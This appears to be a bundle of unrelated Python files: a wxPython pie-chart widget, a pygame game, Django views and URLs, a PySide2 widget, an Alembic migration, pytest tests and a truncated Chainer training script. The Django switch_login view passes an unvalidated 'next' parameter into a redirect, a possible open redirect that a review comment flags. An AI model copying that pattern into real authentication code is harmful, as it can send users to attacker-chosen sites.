        Sets the orientation angle for L{PieCtrl}.

        :param `angle`: the orientation angle for L{PieCtrl}, in radians.
        """

        # Clamp to [0, pi/2].
        if angle < 0:
            angle = 0
        if angle > pi/2:
            angle = pi/2

        self._angle = angle
        self.Refresh()

    def GetAngle(self):
        """ Returns the orientation angle for L{PieCtrl}, in radians. """

        return self._angle

    def SetRotationAngle(self, angle):
        """
        Sets the angle at which the first sector starts.

        :param `angle`: the first sector angle, in radians.
        """

        # Clamp to [0, 2*pi].
        if angle < 0:
            angle = 0
        if angle > 2*pi:
            angle = 2*pi

        self._rotationangle = angle
        self.Refresh()

    def GetRotationAngle(self):
        """ Returns the angle at which the first sector starts, in radians. """

        return self._rotationangle

    def SetShowEdges(self, value=True):
        """
        Sets whether the L{PieCtrl} edges are visible or not.

        :param `value`: ``True`` to show the edges, ``False`` to hide them.
        """

        self._showedges = value
        self.Refresh()

    def GetShowEdges(self):
        """ Returns whether the L{PieCtrl} edges are visible or not. """

        return self._showedges

    def SetBackColour(self, colour):
        """
        Sets the L{PieCtrl} background colour.

        :param `colour`: a valid `wx.Colour` object.
        """

        self._backcolour = colour
        self.Refresh()

    def GetBackColour(self):
        """ Returns the L{PieCtrl} background colour. """

        return self._backcolour

    def SetHeight(self, value):
        """
        Sets the height (in pixels) of the L{PieCtrl}.

        :param `value`: the new height of the widget, in pixels.
        """

        self._height = value

    def GetHeight(self):
        """ Returns the height (in pixels) of the L{PieCtrl}. """

        return self._height

    def GetLegend(self):
        """ Returns the L{PieCtrl} legend. """

        return self._legend

    def DrawParts(self, dc, cx, cy, w, h):
        """
        Draws the L{PieCtrl} external edges.

        :param `dc`: an instance of `wx.DC`;
        :param `cx`: the part x coordinate;
        :param `cy`: the part y coordinate;
        :param `w`: the control's width;
        :param `h`: the control's height.
        """

        angles = self.GetPartAngles()
        oldpen = dc.GetPen()

        if self._showedges:
            dc.SetPen(wx.BLACK_PEN)

        # Draw one elliptic arc per segment between consecutive boundary angles.
        for ii in xrange(len(angles)):

            if ii > 0:
                if not self._showedges:
                    dc.SetPen(wx.Pen(self._series[ii-1].GetColour()))

                dc.SetBrush(wx.Brush(self._series[ii-1].GetColour()))

                if angles[ii-1] != angles[ii]:
                    dc.DrawEllipticArc(0, int((1-sin(self._angle))*(h/2)+cy), w,
                                       int(h*sin(self._angle)),
                                       angles[ii-1]+self._rotationangle/pi*180,
                                       angles[ii]+self._rotationangle/pi*180)

        # A single segment occupies the full 360 degrees.
        if len(self._series) == 1:
            dc.SetBrush(wx.Brush(self._series[0].GetColour()))
            dc.DrawEllipticArc(0, int((1-sin(self._angle))*(h/2)+cy), w,
                               int(h*sin(self._angle)), 0, 360)

        dc.SetPen(oldpen)

    def Draw(self, pdc):
        """
        Draws all the sectors of L{PieCtrl}.

        :param `pdc`: an instance of `wx.DC`.
        """

        w, h = self.GetSize()

        self._canvasDC.BeginDrawing()
        self._canvasDC.SetBackground(wx.WHITE_BRUSH)
        self._canvasDC.Clear()

        # Background: either tile the background bitmap or fill with the
        # background colour.
        if self._background != wx.NullBitmap:

            for ii in xrange(0, w, self._background.GetWidth()):
                for jj in xrange(0, h, self._background.GetHeight()):
                    self._canvasDC.DrawBitmap(self._background, ii, jj)

        else:

            self._canvasDC.SetBackground(wx.Brush(self._backcolour))
            self._canvasDC.Clear()

        if len(self._series) > 0:

            # Bottom edge arcs (the pie's lower rim).
            if self._angle <= pi/2:
                self.DrawParts(self._canvasDC, 0, int(self._height*cos(self._angle)), w, h)
            else:
                self.DrawParts(self._canvasDC, 0, 0, w, h)

            points = [[0, 0]]*4
            triangle = [[0, 0]]*3

            self._canvasDC.SetPen(wx.Pen(wx.BLACK))
            angles = self.GetPartAngles()
            angleindex = 0
            self._canvasDC.SetBrush(wx.Brush(wx.Colour(self._series[angleindex].GetColour().Red(),
                                                       self._series[angleindex].GetColour().Green(),
                                                       self._series[angleindex].GetColour().Blue())))
            changeangle = False
            x = 0.0

            # First pass: fill the pie's top face as a fan of small triangles,
            # stepping 0.05 rad at a time and snapping to each segment boundary.
            while x <= 2*pi:

                changeangle = False

                if angleindex < len(angles):
                    if x/pi*180.0 >= angles[angleindex+1]:
                        changeangle = True
                        x = angles[angleindex+1]*pi/180.0

                points[0] = points[1]
                px = int(w/2*(1+cos(x+self._rotationangle)))
                py = int(h/2-sin(self._angle)*h/2*sin(x+self._rotationangle)-1)
                points[1] = [px, py]
                triangle[0] = [w / 2, h / 2]
                triangle[1] = points[0]
                triangle[2] = points[1]

                if x > 0:
                    self._canvasDC.SetBrush(wx.Brush(self._series[angleindex].GetColour()))
                    oldPen = self._canvasDC.GetPen()
                    self._canvasDC.SetPen(wx.Pen(self._series[angleindex].GetColour()))
                    self._canvasDC.DrawPolygon([wx.Point(pts[0], pts[1]) for pts in triangle])
                    self._canvasDC.SetPen(oldPen)

                if changeangle:
                    angleindex = angleindex + 1

                x = x + 0.05

            # Close the fan exactly at 2*pi.
            x = 2*pi
            points[0] = points[1]
            px = int(w/2 * (1+cos(x+self._rotationangle)))
            py = int(h/2-sin(self._angle)*h/2*sin(x+self._rotationangle)-1)
            points[1] = [px, py]
            triangle[0] = [w / 2, h / 2]
            triangle[1] = points[0]
            triangle[2] = points[1]
            self._canvasDC.SetBrush(wx.Brush(self._series[angleindex].GetColour()))
            oldPen = self._canvasDC.GetPen()
            self._canvasDC.SetPen(wx.Pen(self._series[angleindex].GetColour()))
            self._canvasDC.DrawPolygon([wx.Point(pts[0], pts[1]) for pts in triangle])
            self._canvasDC.SetPen(oldPen)

            angleindex = 0
            x = 0.0

            # Second pass: draw the 3-D side wall as quadrilaterals, shaded
            # darker towards the left (factor 1 - px/w), only where the rim
            # faces the viewer (sin(...) < 0).
            while x <= 2*pi:

                changeangle = False

                if angleindex < len(angles):
                    if x/pi*180 >= angles[angleindex+1]:
                        changeangle = True
                        x = angles[angleindex+1]*pi/180

                points[0] = points[1]
                points[3] = points[2]
                px = int(w/2 * (1+cos(x+self._rotationangle)))
                py = int(h/2-sin(self._angle)*h/2*sin(x+self._rotationangle)-1)
                points[1] = [px, py]
                points[2] = [px, int(py+self._height*cos(self._angle))]

                if w > 0:
                    curColour = wx.Colour(self._series[angleindex].GetColour().Red()*(1.0-float(px)/w),
                                          self._series[angleindex].GetColour().Green()*(1.0-float(px)/w),
                                          self._series[angleindex].GetColour().Blue()*(1.0-float(px)/w))
                    if not self._showedges:
                        self._canvasDC.SetPen(wx.Pen(curColour))
                    self._canvasDC.SetBrush(wx.Brush(curColour))

                if sin(x+self._rotationangle) < 0 and sin(x-0.05+self._rotationangle) <= 0 and x > 0:
                    self._canvasDC.DrawPolygon([wx.Point(pts[0], pts[1]) for pts in points])

                if changeangle:
                    angleindex = angleindex + 1

                x = x + 0.05

            # Close the side wall exactly at 2*pi.
            x = 2*pi
            points[0] = points[1]
            points[3] = points[2]
            px = int(w/2 * (1+cos(x+self._rotationangle)))
            py = int(h/2-sin(self._angle)*h/2*sin(x+self._rotationangle)-1)
            points[1] = [px, py]
            points[2] = [px, int(py+self._height*cos(self._angle))]

            if w > 0:
                curColour = wx.Colour(self._series[angleindex].GetColour().Red()*(1.0-float(px)/w),
                                      self._series[angleindex].GetColour().Green()*(1.0-float(px)/w),
                                      self._series[angleindex].GetColour().Blue()*(1.0-float(px)/w))
                if not self._showedges:
                    self._canvasDC.SetPen(wx.Pen(curColour))
                self._canvasDC.SetBrush(wx.Brush(curColour))

            if sin(x+self._rotationangle) < 0 and sin(x-0.05+self._rotationangle) <= 0:
                self._canvasDC.DrawPolygon([wx.Point(pts[0], pts[1]) for pts in points])

            # Top edge arcs (the pie's upper rim).
            if self._angle <= pi/2:
                self.DrawParts(self._canvasDC, 0, 0, w, h)
            else:
                self.DrawParts(self._canvasDC, 0, int(self._height*cos(self._angle)), w, h)

        self._canvasDC.EndDrawing()
        # Copy the finished canvas to the screen and refresh the legend's
        # background snapshot.
        pdc.Blit(0, 0, w, h, self._canvasDC, 0, 0)
        self._legend.RecreateBackground(self._canvasDC)

    def OnPaint(self, event):
        """
        Handles the ``wx.EVT_PAINT`` event for L{PieCtrl}.

        :param `event`: a `wx.PaintEvent` event to be processed.
        """

        pdc = wx.PaintDC(self)
        self.Draw(pdc)
#----------------------------------------------------------------------
# Class ProgressPie
# This Is The Main ProgressPie Implementation. It Is A Subclass Of
# PieCtrl, With 2 Sectors.
#----------------------------------------------------------------------
class ProgressPie(PieCtrl):
    """
    ProgressPie tries to emulate the behavior of `wx.ProgressDialog`, but
    using a pie chart instead of a gauge. The pie always has exactly two
    segments: series[0] is the "filled" (progress) part, series[1] the
    "unfilled" remainder.
    """

    def __init__(self, parent, maxvalue, value, id=wx.ID_ANY,
                 pos=wx.DefaultPosition, size=wx.DefaultSize, style=0):
        """
        Default class constructor.

        :param `parent`: the L{PieCtrl} parent. Must not be ``None``;
        :param `maxvalue`: the maximum value of the progress pie;
        :param `value`: the initial value, clamped into [0, `maxvalue`];
        :param `id`: window identifier. A value of -1 indicates a default value;
        :param `pos`: the control position. A value of (-1, -1) indicates a default position,
         chosen by either the windowing system or wxPython, depending on platform;
        :param `size`: the control size. A value of (-1, -1) indicates a default size,
         chosen by either the windowing system or wxPython, depending on platform;
        :param `style`: the window style (unused).
        """

        PieCtrl.__init__(self, parent, id, pos, size, style)

        self._maxvalue = maxvalue
        self._value = value
        self.GetLegend().Hide()

        self._filledcolour = wx.Colour(0, 0, 127)
        self._unfilledcolour = wx.WHITE

        # Clamp the initial value into [0, maxvalue].
        filled = max(min(float(value), maxvalue), 0.0)

        part = PiePart()
        part.SetColour(self._filledcolour)
        part.SetValue(filled)
        self._series.append(part)

        part = PiePart()
        part.SetColour(self._unfilledcolour)
        # BUG FIX: the original computed maxvalue - part.GetValue() on the
        # freshly created (zero-valued) part, so the unfilled slice was always
        # maxvalue regardless of `value`. Use the clamped filled value instead,
        # matching SetValue()/SetMaxValue().
        part.SetValue(max(0.0, maxvalue - filled))
        self._series.append(part)

    def SetValue(self, value):
        """
        Sets the L{ProgressPie} value.

        :param `value`: a floating point number representing the new value.
        """

        self._value = min(value, self._maxvalue)
        self._series[0].SetValue(max(self._value, 0.0))
        self._series[1].SetValue(max(self._maxvalue-self._value, 0.0))
        self.Refresh()

    def GetValue(self):
        """ Returns the L{ProgressPie} value. """

        return self._value

    def SetMaxValue(self, value):
        """
        Sets the L{ProgressPie} maximum value.

        :param `value`: a floating point number representing the maximum value.
        """

        self._maxvalue = value
        # Re-clamp the current value and both segments against the new maximum.
        self._value = min(self._value, self._maxvalue)
        self._series[0].SetValue(max(self._value, 0.0))
        self._series[1].SetValue(max(self._maxvalue-self._value, 0.0))
        self.Refresh()

    def GetMaxValue(self):
        """ Returns the L{ProgressPie} maximum value. """

        return self._maxvalue

    def SetFilledColour(self, colour):
        """
        Sets the colour that progressively fills the L{ProgressPie}.

        :param `colour`: a valid `wx.Colour` object.
        """

        self._filledcolour = colour
        self._series[0].SetColour(self._filledcolour)
        self.Refresh()

    def SetUnfilledColour(self, colour):
        """
        Sets the colour of the not-yet-filled part of the L{ProgressPie}.

        :param `colour`: a valid `wx.Colour` object.
        """

        self._unfilledcolour = colour
        self._series[1].SetColour(self._unfilledcolour)
        self.Refresh()

    def GetFilledColour(self):
        """ Returns the colour that progressively fills the L{ProgressPie}. """

        return self._filledcolour

    def GetUnfilledColour(self):
        """ Returns the colour of the not-yet-filled part of the L{ProgressPie}. """

        return self._unfilledcolour
|
import pygame
import random
# Define some colors (RGB tuples; WHITE doubles as the transparency colorkey)
BLACK = ( 0, 0, 0)
WHITE = (255, 255, 255)
RED = (255, 0, 0)
BLUE = ( 0, 0, 255)
class MyEllipse(pygame.sprite.Sprite):
    """A sprite rendered as a solid ellipse of a given color and size."""

    def __init__(self, color, width, height):
        """
        Ellipse Constructor. Pass in the color of the ellipse,
        and its size
        """
        # Initialise the Sprite machinery first.
        super().__init__()

        # Build the sprite surface; WHITE is the colorkey, so everything
        # outside the ellipse is transparent.
        surface = pygame.Surface([width, height])
        surface.fill(WHITE)
        surface.set_colorkey(WHITE)
        pygame.draw.ellipse(surface, color, [0, 0, width, height])

        self.image = surface
        self.rect = self.image.get_rect()
class Ship(pygame.sprite.Sprite):
    """Player sprite whose image is loaded from player.bmp."""

    def __init__(self):
        """ Graphic Sprite Constructor. """

        # Call the parent class (Sprite) constructor
        super().__init__()

        # Load the image (convert() matches the display's pixel format)
        self.image = pygame.image.load("player.bmp").convert()

        # Set our transparent color
        self.image.set_colorkey(WHITE)
        self.rect = self.image.get_rect()
# Mouse-driven collection game: the player sprite follows the mouse and
# "collects" (removes) ellipses on contact, incrementing the score.

# Initialize Pygame
pygame.init()

# Set the height and width of the screen
screen_width = 700
screen_height = 400
screen = pygame.display.set_mode([screen_width, screen_height])

# This is a list of 'sprites.' Each block in the program is
# added to this list. The list is managed by a class called 'Group.'
myellipse_list = pygame.sprite.Group()

# This is a list of every sprite.
# All blocks and the player block as well.
all_sprites_list = pygame.sprite.Group()

for i in range(50):
    # This represents a block
    myellipse = MyEllipse(BLUE, 20, 15)

    # Set a random location for the block
    myellipse.rect.x = random.randrange(screen_width)
    myellipse.rect.y = random.randrange(screen_height)

    # Add the block to the list of objects
    myellipse_list.add(myellipse)
    all_sprites_list.add(myellipse)

# Create the player sprite.
# BUG FIX: the original did `player = Ship` (assigning the class itself, not
# an instance), so `player.rect.x` below raised AttributeError. Instantiate it.
player = Ship()
all_sprites_list.add(player)

# Loop until the user clicks the close button.
done = False

# Used to manage how fast the screen updates
clock = pygame.time.Clock()

score = 0

# -------- Main Program Loop -----------
while not done:
    for event in pygame.event.get():
        if event.type == pygame.QUIT:
            done = True

    # Clear the screen
    screen.fill(WHITE)

    # Get the current mouse position. This returns the position
    # as a list of two numbers.
    pos = pygame.mouse.get_pos()

    # Fetch the x and y out of the list,
    # just like we'd fetch letters out of a string.
    # Set the player object to the mouse location
    player.rect.x = pos[0]
    player.rect.y = pos[1]

    # See if the player block has collided with anything.
    # The True flag removes collided ellipses from all their groups.
    myellipse_hit_list = pygame.sprite.spritecollide(player, myellipse_list, True)

    # Check the list of collisions.
    for myellipse in myellipse_hit_list:
        score += 1
        print(score)

    # Draw all the spites
    all_sprites_list.draw(screen)

    # Go ahead and update the screen with what we've drawn.
    pygame.display.flip()

    # Limit to 60 frames per second
    clock.tick(60)

pygame.quit()
|
from django.urls import path
from .views import about_page

# Route the app root ('') to the about page view; named 'about' for reverse().
urlpatterns = [
    path('', about_page, name='about')
]
|
from PySide2.QtWidgets import QWidget
from PySide2.QtGui import QPixmap, QMouseEvent, Qt
from PySide2.QtCore import QRect, QTimer
from ui.interesting_ui import Ui_Interesting
class Interesting(QWidget, Ui_Interesting):
    """Translucent, draggable desktop widget that plays a looping 12-frame
    sprite animation (from a horizontal sprite sheet) at ~25 fps.

    Drag with the left button to move; double right-click to close.
    """

    def __init__(self, parent=None):
        super().__init__(parent)
        self.setupUi(self)
        # Translucent window background; closing this widget alone must not
        # quit the application.
        self.setAttribute(Qt.WA_TranslucentBackground, True)
        self.setAttribute(Qt.WA_QuitOnClose, False)
        self.setMouseTracking(True)
        self.mousePos = (0, 0)      # press position inside the widget, used as drag offset
        self.isPressed = False
        self.frame = 0              # current animation frame index, 0..11
        # Sprite sheet: 12 frames of 100x100 px laid out horizontally.
        self.original = QPixmap("./resources/lucifer.png")
        self.pixmaps = [self.original.copy(QRect(i*100, 0, 100, 100)) for i in range(12)]
        self.label.setPixmap(self.pixmaps[self.frame])
        # Advance the animation 25 times per second.
        self.timer = QTimer(self)
        self.timer.timeout.connect(self.nextFrame)
        self.timer.start(1000//25)

    def mousePressEvent(self, event: QMouseEvent):
        # Remember where inside the widget the press happened so that
        # mouseMoveEvent can keep the cursor anchored while dragging.
        self.isPressed = True
        self.mousePos = event.x(), event.y()

    def mouseReleaseEvent(self, event: QMouseEvent):
        self.isPressed = False

    def mouseDoubleClickEvent(self, event: QMouseEvent):
        # Double right-click closes the widget; middle button is reserved.
        if event.buttons() & Qt.RightButton:
            self.close()
        elif event.buttons() & Qt.MiddleButton:
            pass

    def mouseMoveEvent(self, event: QMouseEvent):
        # Drag the whole (frameless) window while the mouse is held down.
        if self.isPressed: self.move(event.globalX() - self.mousePos[0], event.globalY() - self.mousePos[1])

    def nextFrame(self):
        """Advance to the next sprite-sheet frame, wrapping after frame 11."""
        self.frame += 1
        self.frame %= 12
        self.label.setPixmap(self.pixmaps[self.frame])
"""HADDOCK3 actions referring to refinement."""
|
import os
from django.conf import settings
from django.contrib.auth import logout as django_logout
from django.contrib.sites.models import Site
from django.http import HttpResponse
from django.shortcuts import render, redirect
from django.views.generic import View, TemplateView
from luna_django_commons.app.mixins import get_login_context
from .forms import (
B2DropProviderForm,
DatafileForm,
DatafileUpdateForm,
DatasetAddFileForm,
DatasetForm,
DropboxProviderForm,
FolderForm,
ForgotPasswordForm,
GDriveProviderForm,
LoginForm,
PasswordChangeForm,
RegisterForm,
ResetPasswordForm,
S3ProviderForm,
WLWebdavProviderForm,
)
class Root(TemplateView):
    """Landing page view; the template is chosen from the current Site domain."""

    def get_template_names(self):
        """
        Returns a list of template names to be used for the request. Must return
        a list. May not be called if render_to_response is overridden.
        """
        domain = Site.objects.get_current().domain
        # "west-life" takes precedence over "pype"; anything else falls back
        # to the West-Life landing page.
        if "pype" in domain and "west-life" not in domain:
            return ['static_pages/landing_pype.html']
        return ['static_pages/landing_westlife.html']
def westlife_services(request):
    """Render the West-Life services page with the login context."""
    return render(request, 'static_pages/westlife/services.html',
                  get_login_context(request))
def legal(request):
    """Render the legal (CGV) page with the login context."""
    return render(request, 'static_pages/cgv.html',
                  get_login_context(request))
def internet_explorer(request):
    """Render the Internet Explorer notice page with the login context."""
    return render(request, 'static_pages/internet_explorer.html',
                  get_login_context(request))
def westlife_static_page(request, page_name='fweh.html', render_kwargs=None):
    """Render an arbitrary static page under static_pages/westlife/."""
    kwargs = render_kwargs if render_kwargs is not None else dict()
    context = get_login_context(request)
    template = 'static_pages/westlife/%s' % page_name
    return render(request, template, context, **kwargs)
#
# Debug information
#
class BuildInfo(View):
    """Debug endpoint: serve the contents of build_info.txt as plain text."""

    def get(self, *args, **kwargs):
        """Return the build info file, or a placeholder message when absent."""
        version_file_path = os.path.join(settings.BASE_DIR, 'build_info.txt')
        try:
            # Explicit encoding so the response does not depend on the locale.
            with open(version_file_path, 'r', encoding='utf-8') as f:
                data = f.read()
        except OSError:  # IOError is an alias of OSError on Python 3
            data = 'No build information found. Probably means we are in development mode.'
        return HttpResponse(data, content_type='text/plain')
class MainPage(TemplateView):
    """Single-page app entry point; preloads every modal form main.html uses."""

    template_name = 'main.html'

    def get_context_data(self, **kwargs):
        """Extend the template context with unbound forms for every dialog."""
        context = super(MainPage, self).get_context_data(**kwargs)
        user = self.request.user
        context.update({
            'INTERCOM_APP_ID': settings.INTERCOM_APP_ID,
            'b2dropprovider_form': B2DropProviderForm(),
            'wlwebdavprovider_form': WLWebdavProviderForm(),
            # Only the password-change form is bound to the current user.
            'change_password_form': PasswordChangeForm(user=user),
            'datafile_form': DatafileForm(),
            'datafile_update_form': DatafileUpdateForm(),
            'dataset_add_file_form': DatasetAddFileForm(),
            'dataset_form': DatasetForm(),
            'dropboxprovider_form': DropboxProviderForm(),
            'folder_form': FolderForm(),
            'forgot_password_form': ForgotPasswordForm(),
            'gdriveprovider_form': GDriveProviderForm(),
            'login_form': LoginForm(),
            'register_form': RegisterForm(),
            'reset_password_form': ResetPasswordForm(),
            's3provider_form': S3ProviderForm(),
        })
        return context
def whoami(request):
    """Return the logged-in username as plain text (empty for anonymous)."""
    username = request.user.username
    return HttpResponse(username)
def logout(request):
    """Log the user out and redirect them to the home page."""
    django_logout(request)
    return redirect('home')
def switch_login(request):
    """Redirect to SAML login when configured, else the regular login page.

    The ``next`` query parameter is forwarded so the user returns to the
    page they came from after authenticating.
    NOTE(review): ``next`` is interpolated unvalidated -- confirm upstream
    protection against open redirects.
    """
    next_url = request.GET.get('next', '/virtualfolder/')
    if hasattr(settings, 'SAML_CONFIG'):
        login_path = '/saml2/login/?next=%s'
    else:
        login_path = '/accounts/login/?next=%s'
    return redirect(login_path % next_url)
|
"""create table game
Revision ID: aeab08c9fd34
Revises: a81e5dd18927
Create Date: 2019-08-11 16:59:53.968757
"""
import sqlalchemy as sa
from alembic import op
# revision identifiers, used by Alembic.
revision = 'aeab08c9fd34'
down_revision = 'a81e5dd18927'
branch_labels = None
depends_on = None
def upgrade():
    """Create the ``game`` table."""
    op.create_table(
        'game',
        sa.Column('id', sa.Integer, primary_key=True),
        sa.Column('name', sa.String(250), nullable=False),
        sa.Column('image', sa.String(250), nullable=False,
                  default='default.jpg'),
    )
def downgrade():
    """Drop the ``game`` table, reversing upgrade()."""
    op.drop_table('game')
|
# -*- coding: utf-8 -*-
from mockdown.mockdown import Mockdown
class TestMockdown:
    """Tests for Mockdown: existence checks, YAML loading, rendering, includes."""

    def test_exists(self, tmpdir):
        m = Mockdown(tmpdir.strpath)
        assert m.exists("a.txt") is False
        tmpdir.join("a.txt").write("hello")
        assert m.exists("a.txt") is True

    def test_read_yaml_file(self, tmpdir):
        # Renamed from 'read_yaml_file': without the 'test_' prefix pytest
        # never collected this test, so it silently did not run.
        m = Mockdown(tmpdir.strpath)
        assert m.read_yaml_file("a.yml") == {}
        tmpdir.join("a.yml").write("name: Alice")
        assert m.read_yaml_file("a.yml") == {"name": "Alice"}

    def test_read_arguments(self, tmpdir):
        m = Mockdown(tmpdir.strpath)
        assert m.read_arguments("a.html") == {}
        tmpdir.join("a.yml").write("name: Alice")
        assert m.read_arguments("a.html") == {"name": "Alice"}

    def test_render_template(self, tmpdir):
        m = Mockdown(tmpdir.strpath)
        tmpdir.join("a.html").write("Hello {{name}}")
        tmpdir.join("a.yml").write("name: Alice")
        assert m.render_template("a.html") == "Hello Alice"

    def test_fake(self, tmpdir, monkeypatch):
        m = Mockdown(tmpdir.strpath)

        class FakeFake:
            def name(self):
                return "fake-name"

            def email(self):
                return "fake-email"

        monkeypatch.setattr(m, "get_fake", lambda filename: FakeFake())
        tmpdir.join("a.yml").write("name: {{fake.name()}}")
        assert m.read_yaml_file("a.yml") == {"name": "fake-name"}

    def test_includes(self, tmpdir):
        m = Mockdown(tmpdir.strpath)
        tmpdir.join("a.yml").write("x: 1\ny: 2\n")
        tmpdir.join("b.yml").write(
            "z: 3\n" +
            "_includes:\n" +
            " - 'a.yml'\n")
        assert m.read_yaml_file("b.yml") == {"x": 1, "y": 2, "z": 3}

    def test_include_overwrites(self, tmpdir):
        # Keys in the including file win over keys pulled in via _includes.
        m = Mockdown(tmpdir.strpath)
        tmpdir.join("a.yml").write("x: 1\ny: 2\n")
        tmpdir.join("b.yml").write(
            "x: 3\n" +
            "_includes:\n" +
            " - 'a.yml'\n")
        assert m.read_yaml_file("b.yml") == {"x": 3, "y": 2}

    def test_deep_include(self, tmpdir):
        m = Mockdown(tmpdir.strpath)
        tmpdir.join("a.yml").write("x: 1\ny: 2\n")
        tmpdir.join("b.yml").write("data: {{include('a.yml')}}")
        assert m.read_yaml_file("b.yml") == {"data": {"x": 1, "y": 2}}
|
#!/usr/bin/env python
import chainer
from teras import training
from teras.app import App, arg
from teras.utils import git, logging
from tqdm import tqdm
import dataset
import eval as eval_module
import models
import parsers
import utils
# Allow int()/float() on chainer Variables by unwrapping the underlying .data.
chainer.Variable.__int__ = lambda self: int(self.data)
chainer.Variable.__float__ = lambda self: float(self.data)
# Route Python warnings through the logging framework.
logging.captureWarnings(True)
def train(
        train_file,
        test_file=None,
        format='tree',
        embed_file=None,
        n_epoch=20,
        batch_size=20,
        lr=0.001,
        limit=-1,
        l2_lambda=0.0,
        grad_clip=5.0,
        encoder_input=('char', 'postag'),
        model_config=None,
        device=-1,
        save_dir=None,
        seed=None,
        cache_dir='',
        disable_cache=False,
        refresh_cache=False):
    """Train a coordination-structure solver.

    Args:
        train_file: Training data file.
        test_file: Optional development data file used for validation.
        format: Data format, 'tree' or 'genia'.
        embed_file: Optional pretrained word-embedding file.
        n_epoch: Number of sweeps over the training data.
        batch_size: Mini-batch size.
        lr: Adam learning rate (alpha).
        limit: Cap on training samples (negative = no cap); the validation
            set is capped at ``limit // 10``.
        l2_lambda: Weight-decay strength (disabled when 0.0).
        grad_clip: Gradient-norm clipping threshold (disabled when <= 0).
        encoder_input: Extra encoder inputs; at most one contextualized
            embedding ('elmo', 'bert-base', 'bert-large') may be included.
        model_config: Dict of model hyperparameters; missing keys default.
        device: GPU device id, or a negative value for CPU.
        save_dir: If set, snapshots are saved there (best model kept).
        seed: Optional random seed.
        cache_dir: Directory for dataset caches.
        disable_cache: Disable the dataset cache entirely.
        refresh_cache: Force dataset caches to be rebuilt.
    """
    if seed is not None:
        utils.set_random_seed(seed, device)
    logger = logging.getLogger()
    assert isinstance(logger, logging.AppLogger)
    if model_config is None:
        model_config = {}
    # The git commit hash participates in the cache key so caches are not
    # reused across code changes.
    loader = dataset.DataLoader.build(
        word_embed_size=model_config.get('word_embed_size', 100),
        postag_embed_size=model_config.get('postag_embed_size', 50),
        char_embed_size=model_config.get('char_embed_size', 10),
        word_embed_file=embed_file,
        filter_coord=(format == 'tree'),
        enable_cache=not(disable_cache),
        refresh_cache=refresh_cache,
        format=format,
        cache_options=dict(dir=cache_dir, mkdir=True, logger=logger),
        extra_ids=(git.hash(),))
    cont_embed_file_ext = _get_cont_embed_file_ext(encoder_input)
    use_cont_embed = cont_embed_file_ext is not None
    train_dataset = loader.load_with_external_resources(
        train_file, train=True, bucketing=False,
        size=None if limit < 0 else limit, refresh_cache=refresh_cache,
        use_external_postags=True,
        use_contextualized_embed=use_cont_embed,
        contextualized_embed_file_ext=cont_embed_file_ext,
        logger=logger)
    logger.info('{} samples loaded for training'.format(len(train_dataset)))
    test_dataset = None
    if test_file is not None:
        test_dataset = loader.load_with_external_resources(
            test_file, train=False, bucketing=False,
            size=None if limit < 0 else limit // 10,
            refresh_cache=refresh_cache,
            use_external_postags=True,
            use_contextualized_embed=use_cont_embed,
            contextualized_embed_file_ext=cont_embed_file_ext,
            logger=logger)
        logger.info('{} samples loaded for validation'
                    .format(len(test_dataset)))
    builder = models.CoordSolverBuilder(
        loader, inputs=encoder_input, **model_config)
    logger.info("{}".format(builder))
    model = builder.build()
    logger.trace("Model: {}".format(model))
    if device >= 0:
        chainer.cuda.get_device_from_id(device).use()
        model.to_gpu(device)
    optimizer = chainer.optimizers.Adam(
        alpha=lr, beta1=0.9, beta2=0.999, eps=1e-08)
    optimizer.setup(model)
    if l2_lambda > 0.0:
        optimizer.add_hook(chainer.optimizer.WeightDecay(l2_lambda))
    if grad_clip > 0.0:
        optimizer.add_hook(chainer.optimizer.GradientClipping(grad_clip))

    def _report(y, t):
        # Collect loss/accuracy metrics from the model after each batch.
        values = {}
        model.compute_accuracy(y, t)
        for k, v in model.result.items():
            if 'loss' in k:
                values[k] = float(chainer.cuda.to_cpu(v.data))
            elif 'accuracy' in k:
                values[k] = v
        training.report(values)

    trainer = training.Trainer(optimizer, model, loss_func=model.compute_loss)
    trainer.configure(utils.training_config)
    trainer.add_listener(
        training.listeners.ProgressBar(lambda n: tqdm(total=n)), priority=200)
    trainer.add_hook(
        training.BATCH_END, lambda data: _report(data['ys'], data['ts']))
    if test_dataset:
        parser = parsers.build_parser(loader, model)
        evaluator = eval_module.Evaluator(
            parser, logger=logger, report_details=False)
        trainer.add_listener(evaluator)
        # NOTE(review): the saver is nested under `if test_dataset` since its
        # evaluate callback needs `evaluator` -- confirm this matches the
        # original (indentation was lost in extraction).
        if save_dir is not None:
            accessid = logger.accessid
            date = logger.accesstime.strftime('%Y%m%d')
            # Teranishi17 models are scored on 'whole' spans, others on 'inner'.
            metric = 'whole' if isinstance(model, models.Teranishi17) else 'inner'
            trainer.add_listener(utils.Saver(
                model, basename="{}-{}".format(date, accessid),
                context=dict(App.context, builder=builder),
                directory=save_dir, logger=logger, save_best=True,
                evaluate=(lambda _: evaluator.get_overall_score(metric))))
    trainer.fit(train_dataset, test_dataset, n_epoch, batch_size)
def test(model_file, test_file, filter_type=True, limit=-1, device=-1):
    """Evaluate a trained model on a test set and report metrics.

    Args:
        model_file: Trained model file (npz) with saved training context.
        test_file: Test data file.
        filter_type: Assigned to ``loader.filter_coord``.
            NOTE(review): the CLI declares string choices ('any', ...) while
            the default here is the bool True -- confirm the intended type.
        limit: Cap on test samples (negative = no cap).
        device: GPU device id, or a negative value for CPU.
    """
    context = utils.Saver.load_context(model_file)
    logger = logging.getLogger()
    logger.trace('# context: {}'.format(context))
    if context.seed is not None:
        utils.set_random_seed(context.seed, device)
    loader = context.builder.loader
    loader.filter_coord = filter_type
    encoder_input = context.encoder_input
    cont_embed_file_ext = _get_cont_embed_file_ext(encoder_input)
    use_cont_embed = cont_embed_file_ext is not None
    test_dataset = loader.load_with_external_resources(
        test_file, train=False, bucketing=False,
        size=None if limit < 0 else limit,
        use_external_postags=True,
        use_contextualized_embed=use_cont_embed,
        contextualized_embed_file_ext=cont_embed_file_ext,
        logger=logger)
    logger.info('{} samples loaded for test'.format(len(test_dataset)))
    model = context.builder.build()
    chainer.serializers.load_npz(model_file, model)
    if device >= 0:
        chainer.cuda.get_device_from_id(device).use()
        model.to_gpu(device)
    parser = parsers.build_parser(loader, model)
    evaluator = eval_module.Evaluator(
        parser, logger=logger, report_details=True)
    reporter = training.listeners.Reporter(logger)
    logger.info('Start decoding')
    utils.chainer_train_off()
    evaluator.on_epoch_validate_begin({'epoch': -1})
    pbar = tqdm(total=len(test_dataset))
    for batch in test_dataset.batch(
            context.batch_size, colwise=True, shuffle=False):
        # Last column is the target; everything before it is model input.
